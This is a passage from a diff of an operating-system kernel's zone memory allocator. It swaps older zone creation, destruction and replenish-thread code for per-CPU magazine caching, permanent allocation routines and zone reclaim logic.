-           !z->tags && !z->zone_logging && !z->gzalloc_tracked) {
-               zcache_init(z);
-       }
-#endif /* CONFIG_ZCACHE */
 
-       lock_zone(z);
-       z->z_self = z;
-       unlock_zone(z);
+       uint16_t n_mags = 0;
 
-       return z;
+       /*
+        * If the recirculation depot has elements, then try to fill
+        * the local per-cpu depot to (1 / zc_recirc_denom)
+        */
+       do {
+               mag = STAILQ_FIRST(&zone->z_recirc);
+               STAILQ_REMOVE_HEAD(&zone->z_recirc, zm_link);
+               STAILQ_INSERT_TAIL(&mags, mag, zm_link);
+               n_mags++;
+
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_t e = mag->zm_elems[i];
+
+                       if (!zone_meta_mark_used(zone_meta_from_element(e), e)) {
+                               zone_meta_double_free_panic(zone, e, __func__);
+                       }
+               }
+       } while (!STAILQ_EMPTY(&zone->z_recirc) &&
+           zc_recirc_denom * n_mags * zc_mag_size() <= cache->zc_depot_max);
+
+       zone_elems_free_sub(zone, n_mags * zc_mag_size());
+       zone_counter_sub(zone, z_recirc_cur, n_mags);
+
+       zone_unlock_nopreempt(zone);
+
+       /*
+        * And then incorporate everything into our per-cpu layer.
+        */
+       mag = STAILQ_FIRST(&mags);
+       STAILQ_REMOVE_HEAD(&mags, zm_link);
+       mag = zone_magazine_replace(&cache->zc_alloc_cur,
+           &cache->zc_alloc_elems, mag);
+       z_debug_assert(cache->zc_alloc_cur == zc_mag_size());
+       z_debug_assert(mag->zm_cur == 0);
+
+       if (--n_mags > 0) {
+               zone_depot_lock_nopreempt(cache);
+               cache->zc_depot_cur += n_mags;
+               STAILQ_CONCAT(&cache->zc_depot, &mags);
+               zone_depot_unlock_nopreempt(cache);
+       }
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, mag);
 }
 
-__startup_func
-void
-zone_create_startup(struct zone_create_startup_spec *spec)
+/*!
+ * @function zalloc_cached
+ *
+ * @brief
+ * Performs allocations when zone caching is on.
+ *
+ * @discussion
+ * This function calls @c zalloc_cached_fast() when the caches have elements
+ * ready.
+ *
+ * Else it will call @c zalloc_cached_slow() so that the cache is refilled,
+ * which might switch to the @c zalloc_item_slow() track when the backing zone
+ * needs to be refilled.
+ */
+static void *
+zalloc_cached(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
 {
-       *spec->z_var = zone_create_ext(spec->z_name, spec->z_size,
-           spec->z_flags, spec->z_zid, spec->z_setup);
+       zone_cache_t cache;
+
+       disable_preemption();
+       cache = zpercpu_get(zone->z_pcpu_cache);
+
+       if (cache->zc_alloc_cur == 0) {
+               if (__improbable(cache->zc_free_cur == 0)) {
+                       return zalloc_cached_slow(zone, zstats, flags, cache);
+               }
+               zone_cache_swap_magazines(cache);
+       }
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, NULL);
 }
 
-/*
- * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t
- * union works. trust but verify.
+/*!
+ * @function zalloc_ext
+ *
+ * @brief
+ * The core implementation of @c zalloc(), @c zalloc_flags(), @c zalloc_percpu().
  */
-#define zalloc_check_zov_alias(f1, f2) \
-    static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2))
-zalloc_check_zov_alias(z_self, zv_zone);
-zalloc_check_zov_alias(z_stats, zv_stats);
-zalloc_check_zov_alias(z_name, zv_name);
-zalloc_check_zov_alias(z_views, zv_next);
-#undef zalloc_check_zov_alias
-
-__startup_func
-void
-zone_view_startup_init(struct zone_view_startup_spec *spec)
+void *
+zalloc_ext(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
 {
-       struct kalloc_heap *heap = NULL;
-       zone_view_t zv = spec->zv_view;
-       zone_t z;
+       /*
+        * KASan uses zalloc() for fakestack, which can be called anywhere.
+        * However, we make sure these calls can never block.
+        */
+       assert(zone->kasan_fakestacks ||
+           ml_get_interrupts_enabled() ||
+           ml_is_quiescing() ||
+           debug_mode_active() ||
+           startup_phase < STARTUP_SUB_EARLY_BOOT);
 
-       switch (spec->zv_heapid) {
-       case KHEAP_ID_DEFAULT:
-               heap = KHEAP_DEFAULT;
-               break;
-       case KHEAP_ID_DATA_BUFFERS:
-               heap = KHEAP_DATA_BUFFERS;
-               break;
-       case KHEAP_ID_KEXT:
-               heap = KHEAP_KEXT;
-               break;
-       default:
-               heap = NULL;
+       /*
+        * Make sure Z_NOFAIL was not obviously misused
+        */
+       if (zone->z_replenishes) {
+               assert((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
+       } else if (flags & Z_NOFAIL) {
+               assert(!zone->exhaustible &&
+                   (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
        }
 
-       if (heap) {
-               z = kalloc_heap_zone_for_size(heap, spec->zv_size);
-               assert(z);
-       } else {
-               z = spec->zv_zone;
-               assert(spec->zv_size <= zone_elem_size(z));
+#if CONFIG_GZALLOC
+       if (__improbable(zone->gzalloc_tracked)) {
+               return zalloc_gz(zone, zstats, flags);
        }
+#endif /* CONFIG_GZALLOC */
 
-       zv->zv_zone  = z;
-       zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats);
-       zv->zv_next  = z->z_views;
-       if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) {
-               /*
-                * count the raw view for zones not in a heap,
-                * kalloc_heap_init() already counts it for its members.
-                */
-               zone_view_count += 2;
-       } else {
-               zone_view_count += 1;
+       if (zone->z_pcpu_cache) {
+               return zalloc_cached(zone, zstats, flags);
        }
-       z->z_views = zv;
+
+       return zalloc_item(zone, zstats, flags);
 }
 
-zone_t
-zone_create(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags)
+void *
+zalloc(union zone_or_view zov)
 {
-       return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL);
+       return zalloc_flags(zov, Z_WAITOK);
 }
 
-zone_t
-zinit(
-       vm_size_t       size,           /* the size of an element */
-       vm_size_t       max,            /* maximum memory to use */
-       vm_size_t       alloc __unused, /* allocation size */
-       const char      *name)          /* a name for the zone */
+void *
+zalloc_noblock(union zone_or_view zov)
+{
+       return zalloc_flags(zov, Z_NOWAIT);
+}
+
+void *
+zalloc_flags(union zone_or_view zov, zalloc_flags_t flags)
 {
-       zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE);
-       zone_set_max(z, max);
-       return z;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(!zone->z_percpu);
+       return zalloc_ext(zone, zstats, flags);
 }
 
-void
-zdestroy(zone_t z)
+void *
+zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags)
 {
-       unsigned int zindex = zone_index(z);
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(zone->z_percpu);
+       return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags));
+}
 
-       lock_zone(z);
+static void *
+_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask)
+{
+       struct zone_page_metadata *page_meta;
+       vm_offset_t offs, addr;
+       zone_pva_t pva;
 
-       if (!z->destructible || zone_caching_enabled(z) || z->allows_foreign) {
-               panic("zdestroy: Zone %s%s isn't destructible",
-                   zone_heap_name(z), z->z_name);
-       }
+       assert(ml_get_interrupts_enabled() ||
+           ml_is_quiescing() ||
+           debug_mode_active() ||
+           startup_phase < STARTUP_SUB_EARLY_BOOT);
 
-       if (!z->z_self || z->expanding_no_vm_priv || z->expanding_vm_priv ||
-           z->async_pending || z->waiting) {
-               panic("zdestroy: Zone %s%s in an invalid state for destruction",
-                   zone_heap_name(z), z->z_name);
-       }
+       size = (size + mask) & ~mask;
+       assert(size <= PAGE_SIZE);
 
-#if !KASAN_ZALLOC
-       /*
-        * Unset the valid bit. We'll hit an assert failure on further operations
-        * on this zone, until zinit() is called again.
-        *
-        * Leave the zone valid for KASan as we will see zfree's on quarantined free
-        * elements even after the zone is destroyed.
-        */
-       z->z_self = NULL;
-#endif
-       z->destroyed = true;
-       unlock_zone(z);
+       zone_lock(zone);
+       assert(zone->z_self == zone);
 
-       /* Dump all the free elements */
-       zone_drop_free_elements(z);
+       for (;;) {
+               pva = zone->z_pageq_partial;
+               while (!zone_pva_is_null(pva)) {
+                       page_meta = zone_pva_to_meta(pva);
+                       if (page_meta->zm_bump + size <= PAGE_SIZE) {
+                               goto found;
+                       }
+                       pva = page_meta->zm_page_next;
+               }
 
-#if CONFIG_GZALLOC
-       if (__improbable(z->gzalloc_tracked)) {
-               /* If the zone is gzalloc managed dump all the elements in the free cache */
-               gzalloc_empty_free_cache(z);
+               zone_expand_locked(zone, Z_WAITOK, NULL);
        }
-#endif
-
-       lock_zone(z);
 
-       while (!zone_pva_is_null(z->pages_sequester)) {
-               struct zone_page_metadata *page_meta;
-               vm_offset_t                free_addr;
-
-               page_meta = zone_sequestered_page_get(z, &free_addr);
-               unlock_zone(z);
-               kmem_free(submap_for_zone(z), free_addr, ptoa(z->alloc_pages));
-               lock_zone(z);
-       }
+found:
+       offs = (uint16_t)((page_meta->zm_bump + mask) & ~mask);
+       page_meta->zm_bump = (uint16_t)(offs + size);
+       page_meta->zm_alloc_size += size;
+       zone->z_elems_free -= size;
+       zpercpu_get(zone->z_stats)->zs_mem_allocated += size;
 
-#if !KASAN_ZALLOC
-       /* Assert that all counts are zero */
-       if (z->countavail || z->countfree || zone_size_wired(z) ||
-           z->allfree_page_count || z->sequester_page_count) {
-               panic("zdestroy: Zone %s%s isn't empty at zdestroy() time",
-                   zone_heap_name(z), z->z_name);
+       if (page_meta->zm_alloc_size >= PAGE_SIZE - sizeof(vm_offset_t)) {
+               zone_meta_requeue(zone, &zone->z_pageq_full, page_meta);
        }
 
-       /* consistency check: make sure everything is indeed empty */
-       assert(zone_pva_is_null(z->pages_any_free_foreign));
-       assert(zone_pva_is_null(z->pages_all_used_foreign));
-       assert(zone_pva_is_null(z->pages_all_free));
-       assert(zone_pva_is_null(z->pages_intermediate));
-       assert(zone_pva_is_null(z->pages_all_used));
-       assert(zone_pva_is_null(z->pages_sequester));
-#endif
-
-       unlock_zone(z);
-
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       zone_unlock(zone);
 
-       assert(!bitmap_test(zone_destroyed_bitmap, zindex));
-       /* Mark the zone as empty in the bitmap */
-       bitmap_set(zone_destroyed_bitmap, zindex);
-       num_zones_in_use--;
-       assert(num_zones_in_use > 0);
+       addr = offs + zone_pva_to_addr(pva);
 
-       simple_unlock(&all_zones_lock);
+       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
+       return (void *)addr;
 }
 
-#pragma mark zone (re)fill, jetsam
-
-/*
- * Dealing with zone allocations from the mach VM code.
- *
- * The implementation of the mach VM itself uses the zone allocator
- * for things like the vm_map_entry data structure. In order to prevent
- * an infinite recursion problem when adding more pages to a zone, zalloc
- * uses a replenish thread to refill the VM layer's zones before they have
- * too few remaining free entries. The reserved remaining free entries
- * guarantee that the VM routines can get entries from already mapped pages.
- *
- * In order for that to work, the amount of allocations in the nested
- * case have to be bounded. There are currently 2 replenish zones, and
- * if each needs 1 element of each zone to add a new page to itself, that
- * gives us a minumum reserve of 2 elements.
- *
- * There is also a deadlock issue with the zone garbage collection thread,
- * or any thread that is trying to free zone pages. While holding
- * the kernel's map lock they may need to allocate new VM map entries, hence
- * we need enough reserve to allow them to get past the point of holding the
- * map lock. After freeing that page, the GC thread will wait in drop_free_elements()
- * until the replenish threads can finish. Since there's only 1 GC thread at a time,
- * that adds a minimum of 1 to the reserve size.
- *
- * Since the minumum amount you can add to a zone is 1 page, we'll use 16K (from ARM)
- * as the refill size on all platforms.
- *
- * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2,
- * zalloc_ext() will wake the replenish thread. The replenish thread runs
- * until at least REFILL_SIZE worth of free elements exist, before sleeping again.
- * In the meantime threads may continue to use the reserve until there are only REFILL_SIZE / 4
- * elements left. Below that point only the replenish threads themselves and the GC
- * thread may continue to use from the reserve.
- */
-static unsigned zone_replenish_loops;
-static unsigned zone_replenish_wakeups;
-static unsigned zone_replenish_wakeups_initiated;
-static unsigned zone_replenish_throttle_count;
-
-#define ZONE_REPLENISH_TARGET (16 * 1024)
-static unsigned zone_replenish_active = 0; /* count of zones currently replenishing */
-static unsigned zone_replenish_max_threads = 0;
+static void *
+_zalloc_permanent_large(size_t size, vm_offset_t mask)
+{
+       kern_return_t kr;
+       vm_offset_t addr;
 
-LCK_GRP_DECLARE(zone_replenish_lock_grp, "zone_replenish_lock");
-LCK_SPIN_DECLARE(zone_replenish_lock, &zone_replenish_lock_grp);
+       kr = kernel_memory_allocate(kernel_map, &addr, size, mask,
+           KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO,
+           VM_KERN_MEMORY_KALLOC);
+       if (kr != 0) {
+               panic("zalloc_permanent: unable to allocate %zd bytes (%d)",
+                   size, kr);
+       }
+       return (void *)addr;
+}
 
-__abortlike
-static void
-zone_replenish_panic(zone_t zone, kern_return_t kr)
+void *
+zalloc_permanent(vm_size_t size, vm_offset_t mask)
 {
-       panic_include_zprint = TRUE;
-#if CONFIG_ZLEAKS
-       if ((zleak_state & ZLEAK_STATE_ACTIVE)) {
-               panic_include_ztrace = TRUE;
-       }
-#endif /* CONFIG_ZLEAKS */
-       if (kr == KERN_NO_SPACE) {
-               zone_t zone_largest = zone_find_largest();
-               panic("zalloc: zone map exhausted while allocating from zone %s%s, "
-                   "likely due to memory leak in zone %s%s "
-                   "(%lu total bytes, %d elements allocated)",
-                   zone_heap_name(zone), zone->z_name,
-                   zone_heap_name(zone_largest), zone_largest->z_name,
-                   (unsigned long)zone_size_wired(zone_largest),
-                   zone_count_allocated(zone_largest));
+       if (size <= PAGE_SIZE) {
+               zone_t zone = &zone_array[ZONE_ID_PERMANENT];
+               return _zalloc_permanent(zone, size, mask);
        }
-       panic("zalloc: %s%s (%d elements) retry fail %d",
-           zone_heap_name(zone), zone->z_name,
-           zone_count_allocated(zone), kr);
+       return _zalloc_permanent_large(size, mask);
 }
 
-static void
-zone_replenish_locked(zone_t z, zalloc_flags_t flags, bool asynchronously)
+void *
+zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask)
 {
-       int kmaflags = KMA_KOBJECT | KMA_ZERO;
-       vm_offset_t space, alloc_size;
-       uint32_t retry = 0;
-       kern_return_t kr;
+       zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT];
+       return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask));
+}
 
-       if (z->noencrypt) {
-               kmaflags |= KMA_NOENCRYPT;
-       }
-       if (flags & Z_NOPAGEWAIT) {
-               kmaflags |= KMA_NOPAGEWAIT;
-       }
-       if (z->permanent) {
-               kmaflags |= KMA_PERMANENT;
-       }
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone GC / trimming
+#if !ZALLOC_TEST
 
-       for (;;) {
-               struct zone_page_metadata *page_meta = NULL;
+static thread_call_data_t zone_defrag_callout;
 
-               /*
-                * Try to allocate our regular chunk of pages,
-                * unless the system is under massive pressure
-                * and we're looking for more than 2 pages.
-                */
-               if (!z->percpu && z->alloc_pages > 2 && (vm_pool_low() || retry > 0)) {
-                       alloc_size = round_page(zone_elem_size(z));
-               } else {
-                       alloc_size = ptoa(z->alloc_pages);
-                       page_meta = zone_sequestered_page_get(z, &space);
-               }
+static void
+zone_reclaim_chunk(zone_t z, struct zone_page_metadata *meta, uint32_t free_count)
+{
+       vm_address_t page_addr;
+       vm_size_t    size_to_free;
+       uint32_t     bitmap_ref;
+       uint32_t     page_count;
+       bool         sequester = z->z_va_sequester && !z->z_destroyed;
 
-               unlock_zone(z);
+       zone_meta_queue_pop_native(z, &z->z_pageq_empty, &page_addr);
 
-#if CONFIG_ZLEAKS
-               /*
-                * Do the zone leak activation here because zleak_activate()
-                * may block, and can't be done on the way out.
-                */
-               if (__improbable(zleak_state & ZLEAK_STATE_ENABLED)) {
-                       if (!(zleak_state & ZLEAK_STATE_ACTIVE) &&
-                           zone_submaps_approx_size() >= zleak_global_tracking_threshold) {
-                               kr = zleak_activate();
-                               if (kr != KERN_SUCCESS) {
-                                       printf("Failed to activate live zone leak debugging (%d).\n", kr);
-                               }
-                       }
-               }
-#endif /* CONFIG_ZLEAKS */
+       page_count = meta->zm_chunk_len;
 
-               /*
-                * Trigger jetsams via the vm_pageout_garbage_collect thread if
-                * we're running out of zone memory
-                */
-               if (is_zone_map_nearing_exhaustion()) {
-                       thread_wakeup((event_t) &vm_pageout_garbage_collect);
+       if (meta->zm_alloc_size) {
+               zone_metadata_corruption(z, meta, "alloc_size");
+       }
+       if (z->z_percpu) {
+               if (page_count != 1) {
+                       zone_metadata_corruption(z, meta, "page_count");
                }
-
-               if (page_meta) {
-                       kr = zone_sequestered_page_populate(z, page_meta, space,
-                           alloc_size, kmaflags);
-               } else {
-                       if (z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP && z->kalloc_heap != KHEAP_ID_NONE) {
-                               kmaflags |= KMA_KHEAP;
-                       }
-                       kr = kernel_memory_allocate(submap_for_zone(z),
-                           &space, alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
+               size_to_free = ptoa(z->z_chunk_pages);
+               os_atomic_sub(&zones_phys_page_mapped_count,
+                   z->z_chunk_pages, relaxed);
+       } else {
+               if (page_count > z->z_chunk_pages) {
+                       zone_metadata_corruption(z, meta, "page_count");
                }
-
-#if !__LP64__
-               if (kr == KERN_NO_SPACE && z->allows_foreign) {
-                       /*
-                        * For zones allowing foreign pages, fallback to the kernel map
-                        */
-                       kr = kernel_memory_allocate(kernel_map, &space,
-                           alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
+               if (page_count < z->z_chunk_pages) {
+                       /* Dequeue non populated VA from z_pageq_va */
+                       zone_meta_remqueue(z, meta + page_count);
                }
-#endif
+               size_to_free = ptoa(page_count);
+               os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed);
+       }
 
-               if (kr == KERN_SUCCESS) {
-                       break;
-               }
+       zone_counter_sub(z, z_elems_free, free_count);
+       zone_counter_sub(z, z_elems_avail, free_count);
+       zone_counter_sub(z, z_wired_empty, page_count);
+       zone_counter_sub(z, z_wired_cur, page_count);
+       if (z->z_elems_free_min < free_count) {
+               z->z_elems_free_min = 0;
+       } else {
+               z->z_elems_free_min -= free_count;
+       }
+       if (z->z_elems_free_max < free_count) {
+               z->z_elems_free_max = 0;
+       } else {
+               z->z_elems_free_max -= free_count;
+       }
 
-               if (flags & Z_NOPAGEWAIT) {
-                       lock_zone(z);
-                       return;
+       bitmap_ref = 0;
+       if (sequester) {
+               if (meta->zm_inline_bitmap) {
+                       for (int i = 0; i < meta->zm_chunk_len; i++) {
+                               meta[i].zm_bitmap = 0;
+                       }
+               } else {
+                       bitmap_ref = meta->zm_bitmap;
+                       meta->zm_bitmap = 0;
                }
-
-               if (asynchronously) {
-                       assert_wait_timeout(&z->prio_refill_count,
-                           THREAD_UNINT, 1, 100 * NSEC_PER_USEC);
-                       thread_block(THREAD_CONTINUE_NULL);
-               } else if (++retry == 3) {
-                       zone_replenish_panic(z, kr);
+               meta->zm_chunk_len = 0;
+       } else {
+               if (!meta->zm_inline_bitmap) {
+                       bitmap_ref = meta->zm_bitmap;
                }
-
-               lock_zone(z);
+               zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages);
+               bzero(meta, sizeof(*meta) * z->z_chunk_pages);
        }
 
-       zcram_and_lock(z, space, alloc_size);
+       zone_unlock(z);
 
-#if CONFIG_ZLEAKS
-       if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) {
-               if (!z->zleak_on &&
-                   zone_size_wired(z) >= zleak_per_zone_tracking_threshold) {
-                       z->zleak_on = true;
-               }
+       if (bitmap_ref) {
+               zone_bits_free(bitmap_ref);
        }
-#endif /* CONFIG_ZLEAKS */
-}
-
-/*
- * High priority VM privileged thread used to asynchronously refill a given zone.
- * These are needed for data structures used by the lower level VM itself. The
- * replenish thread maintains a reserve of elements, so that the VM will never
- * block in the zone allocator.
- */
-__dead2
-static void
-zone_replenish_thread(void *_z, wait_result_t __unused wr)
-{
-       zone_t z = _z;
 
-       current_thread()->options |= (TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV);
-
-       for (;;) {
-               lock_zone(z);
-               assert(z->z_self == z);
-               assert(z->zone_replenishing);
-               assert(z->prio_refill_count != 0);
+       /* Free the pages for metadata and account for them */
+#if KASAN_ZALLOC
+       kasan_poison_range(page_addr, size_to_free, ASAN_VALID);
+#endif
+#if VM_MAX_TAG_ZONES
+       if (z->tags) {
+               ztMemoryRemove(z, page_addr, size_to_free);
+       }
+#endif /* VM_MAX_TAG_ZONES */
 
-               while (z->countfree < z->prio_refill_count) {
-                       assert(!z->expanding_no_vm_priv);
-                       assert(!z->expanding_vm_priv);
+       if (sequester) {
+               kernel_memory_depopulate(zone_submap(z), page_addr,
+                   size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE);
+       } else {
+               kmem_free(zone_submap(z), page_addr, ptoa(z->z_chunk_pages));
+       }
 
-                       zone_replenish_locked(z, Z_WAITOK, true);
+       /*
+        * Freeing memory sometimes needs some (for example vm map entries
+        * to represent holes).
+        *
+        * If there are any active replenish threads, we need to let them work
+        * while we hold no locks. Only do so right after we just freed memory
+        * once however to give them even more chances to find fresh pages.
+        */
+       zone_replenish_wait_if_needed();
 
-                       assert(z->z_self == z);
-                       zone_replenish_loops++;
-               }
+       thread_yield_to_preemption();
 
-               /* Wakeup any potentially throttled allocations. */
-               thread_wakeup(z);
+       zone_lock(z);
 
-               assert_wait(&z->prio_refill_count, THREAD_UNINT);
+       if (sequester) {
+               zone_meta_queue_push(z, &z->z_pageq_va, meta);
+       }
+}
 
-               /*
-                * We finished refilling the zone, so decrement the active count
-                * and wake up any waiting GC threads.
-                */
-               lck_spin_lock(&zone_replenish_lock);
-               assert(zone_replenish_active > 0);
-               if (--zone_replenish_active == 0) {
-                       thread_wakeup((event_t)&zone_replenish_active);
-               }
-               lck_spin_unlock(&zone_replenish_lock);
+static uint16_t
+zone_reclaim_elements(zone_t z, uint16_t *count, zone_element_t *elems)
+{
+       uint16_t n = *count;
 
-               z->zone_replenishing = false;
-               unlock_zone(z);
+       z_debug_assert(n <= zc_mag_size());
 
-               thread_block(THREAD_CONTINUE_NULL);
-               zone_replenish_wakeups++;
+       for (uint16_t i = 0; i < n; i++) {
+               zone_element_t ze = elems[i];
+               elems[i].ze_value = 0;
+               zfree_drop(z, zone_element_validate(z, ze), ze, false);
        }
+
+       *count = 0;
+       return n;
 }
 
-void
-zone_prio_refill_configure(zone_t z)
+static uint16_t
+zone_reclaim_recirc_magazine(zone_t z, struct zone_depot *mags)
 {
-       thread_t th;
-       kern_return_t tres;
+       zone_magazine_t mag = STAILQ_FIRST(&z->z_recirc);
 
-       lock_zone(z);
-       assert(!z->prio_refill_count && !z->destructible);
-       z->prio_refill_count = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z));
-       z->zone_replenishing = true;
-       unlock_zone(z);
+       STAILQ_REMOVE_HEAD(&z->z_recirc, zm_link);
+       STAILQ_INSERT_TAIL(mags, mag, zm_link);
+       zone_counter_sub(z, z_recirc_cur, 1);
 
-       lck_spin_lock(&zone_replenish_lock);
-       ++zone_replenish_max_threads;
-       ++zone_replenish_active;
-       lck_spin_unlock(&zone_replenish_lock);
-       OSMemoryBarrier();
+       z_debug_assert(mag->zm_cur == zc_mag_size());
 
-       tres = kernel_thread_start_priority(zone_replenish_thread, z,
-           MAXPRI_KERNEL, &th);
-       if (tres != KERN_SUCCESS) {
-               panic("zone_prio_refill_configure, thread create: 0x%x", tres);
+       for (uint16_t i = 0; i < zc_mag_size(); i++) {
+               zone_element_t ze = mag->zm_elems[i];
+               mag->zm_elems[i].ze_value = 0;
+               zfree_drop(z, zone_element_validate(z, ze), ze, true);
        }
 
-       thread_deallocate(th);
+       mag->zm_cur = 0;
+
+       return zc_mag_size();
 }
 
 static void
-zone_randomize_freelist(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t size, zone_addr_kind_t kind, unsigned int *entropy_buffer)
-{
-       const vm_size_t elem_size = zone_elem_size(zone);
-       vm_offset_t     left, right, head, base;
-       vm_offset_t     element;
-
-       left  = ZONE_PAGE_FIRST_OFFSET(kind);
-       right = size - ((size - left) % elem_size);
-       head  = 0;
-       base  = zone_meta_to_addr(meta, kind);
-
-       while (left < right) {
-               if (zone_leaks_scan_enable || __improbable(zone->tags) ||
-                   random_bool_gen_bits(&zone_bool_gen, entropy_buffer, MAX_ENTROPY_PER_ZCRAM, 1)) {
-                       element = base + left;
-                       left += elem_size;
-               } else {
-                       right -= elem_size;
-                       element = base + right;
-               }
+zone_depot_trim(zone_cache_t zc, struct zone_depot *head)
+{
+       zone_magazine_t mag;
+
+       if (zc->zc_depot_cur == 0 ||
+           2 * (zc->zc_depot_cur + 1) * zc_mag_size() <= zc->zc_depot_max) {
+               return;
+       }
 
-               vm_offset_t *primary  = (vm_offset_t *)element;
-               vm_offset_t *backup   = get_backup_ptr(elem_size, primary);
+       zone_depot_lock(zc);
 
-               *primary = *backup = head ^ zp_nopoison_cookie;
-               head = element;
+       while (zc->zc_depot_cur &&
+           2 * (zc->zc_depot_cur + 1) * zc_mag_size() > zc->zc_depot_max) {
+               mag = STAILQ_FIRST(&zc->zc_depot);
+               STAILQ_REMOVE_HEAD(&zc->zc_depot, zm_link);
+               STAILQ_INSERT_TAIL(head, mag, zm_link);
+               zc->zc_depot_cur--;
        }
 
-       meta->zm_freelist_offs = (uint16_t)(head - base);
+       zone_depot_unlock(zc);
 }
 
-/*
- *     Cram the given memory into the specified zone. Update the zone page count accordingly.
+__enum_decl(zone_reclaim_mode_t, uint32_t, {
+       ZONE_RECLAIM_TRIM,
+       ZONE_RECLAIM_DRAIN,
+       ZONE_RECLAIM_DESTROY,
+});
+
+/*!
+ * @function zone_reclaim
+ *
+ * @brief
+ * Drains or trim the zone.
+ *
+ * @discussion
+ * Draining the zone will free it from all its elements.
+ *
+ * Trimming the zone tries to respect the working set size, and avoids draining
+ * the depot when it's not necessary.
+ *
+ * @param z             The zone to reclaim from
+ * @param mode          The purpose of this reclaim.
  */
 static void
-zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size)
+zone_reclaim(zone_t z, zone_reclaim_mode_t mode)
 {
-       unsigned int entropy_buffer[MAX_ENTROPY_PER_ZCRAM] = { 0 };
-       struct zone_page_metadata *meta;
-       zone_addr_kind_t kind;
-       uint32_t pg_count = (uint32_t)atop(size);
-       uint32_t zindex = zone_index(zone);
-       uint32_t free_count;
-       uint16_t empty_freelist_offs = PAGE_METADATA_EMPTY_FREELIST;
-
-       /* Basic sanity checks */
-       assert(zone != ZONE_NULL && newmem != (vm_offset_t)0);
-       assert((newmem & PAGE_MASK) == 0);
-       assert((size & PAGE_MASK) == 0);
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+       zone_magazine_t mag, tmp;
 
-       KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_START,
-           zindex, size);
+       zone_lock(z);
 
-       kind = zone_addr_kind(newmem, size);
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZCRAM) {
-               kprintf("zcram(%p[%s%s], 0x%lx%s, 0x%lx)\n", zone,
-                   zone_heap_name(zone), zone->z_name, (uintptr_t)newmem,
-                   kind == ZONE_ADDR_FOREIGN ? "[F]" : "", (uintptr_t)size);
-       }
-#endif /* DEBUG || DEVELOPMENT */
+       if (mode == ZONE_RECLAIM_DESTROY) {
+               if (!z->z_destructible || z->z_pcpu_cache ||
+                   z->z_elems_rsv || z->z_allows_foreign) {
+                       panic("zdestroy: Zone %s%s isn't destructible",
+                           zone_heap_name(z), z->z_name);
+               }
 
-       /*
-        * Initialize the metadata for all pages. We dont need the zone lock
-        * here because we are not manipulating any zone related state yet.
-        *
-        * This includes randomizing the freelists as the metadata isn't
-        * published yet.
-        */
+               if (!z->z_self || z->z_expander || z->z_expander_vm_priv ||
+                   z->z_async_refilling || z->z_expanding_wait) {
+                       panic("zdestroy: Zone %s%s in an invalid state for destruction",
+                           zone_heap_name(z), z->z_name);
+               }
 
-       if (kind == ZONE_ADDR_NATIVE) {
+#if !KASAN_ZALLOC
                /*
-                * We're being called by zfill,
-                * zone_replenish_thread or vm_page_more_fictitious,
+                * Unset the valid bit. We'll hit an assert failure on further
+                * operations on this zone, until zinit() is called again.
                 *
-                * which will only either allocate a single page, or `alloc_pages`
-                * worth.
+                * Leave the zone valid for KASan as we will see zfree's on
+                * quarantined free elements even after the zone is destroyed.
                 */
-               assert(pg_count <= zone->alloc_pages);
-
+               z->z_self = NULL;
+#endif
+               z->z_destroyed = true;
+       } else if (z->z_destroyed) {
+               return zone_unlock(z);
+       } else if (z->z_replenishes && z->z_async_refilling) {
                /*
-                * Make sure the range of metadata entries we're about to init
-                * have proper physical backing, then initialize them.
+                * If the zone is replenishing, leave it alone.
                 */
-               meta = zone_meta_from_addr(newmem, kind);
-               zone_meta_populate(meta, meta + pg_count);
+               return zone_unlock(z);
+       }
 
-               if (zone->permanent) {
-                       empty_freelist_offs = 0;
+       if (z->z_pcpu_cache) {
+               if (mode != ZONE_RECLAIM_TRIM) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zc->zc_depot_max /= 2;
+                       }
+               } else {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               if (zc->zc_depot_max > 0) {
+                                       zc->zc_depot_max--;
+                               }
+                       }
                }
 
-               meta[0] = (struct zone_page_metadata){
